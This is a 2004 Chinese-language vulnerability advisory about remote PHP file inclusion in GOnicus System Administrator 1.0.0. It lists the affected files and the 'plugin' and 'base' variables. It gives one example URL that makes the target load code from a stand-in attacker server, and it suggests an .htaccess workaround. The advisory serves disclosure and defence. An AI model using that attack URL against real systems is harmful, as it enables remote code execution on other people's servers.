网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 安全漏洞 > Microsoft > GOnicus System Administrator 存在PHP注入缺陷 (MS,缺陷)  

GOnicus System Administrator 存在PHP注入缺陷 (MS,缺陷)

2004-04-08  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

涉及程序:
GOnicus System Administrator 1.0.0版
 
描述:
GOnicus System Administrator 存在PHP注入缺陷
 
详细:
GOnicus System Administrator是一款PHP管理工具,用于管理LDAP数据库的帐户和系统。远程攻击者能在GOnicus System Administrator中注入任意PHP代码,通过更改几个变量,攻击者能在WEB服务器上执行任意代码。

通过在下列文档中设置plugin变量,攻击者能包含并执行远程文件:
plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php

include/help.php文件也存在同样问题。攻击者提供恶意URL,导致用户从攻击者服务器上装载包含恶意代码的include/common.inc文件,并以WEB权限执行文件中包含的恶意代码。
 
 
攻击方法:
示例代码:
http://target.server/include/help.php?base=http://attackers.server/
 
 
网管下载dl.bitscn.com

解决方案:
目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:
http://www.gonicus.de

临时解决方案:
对所有包含.php文件的子目录通过.htaccess进行访问限制。
 
 
附加信息:


TAGs缺陷   注入   存在   攻击   代码   包含   通过   PHP   执行   恶意    
 上一篇:微软安全公告 MS03-001 (MS,补丁)   下一篇:CoffeeCup Password Wizard 存在信息泄露缺陷 (MS,缺陷)
GOnicus System Administrator 存在PHP注入缺陷 (MS,缺陷) 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: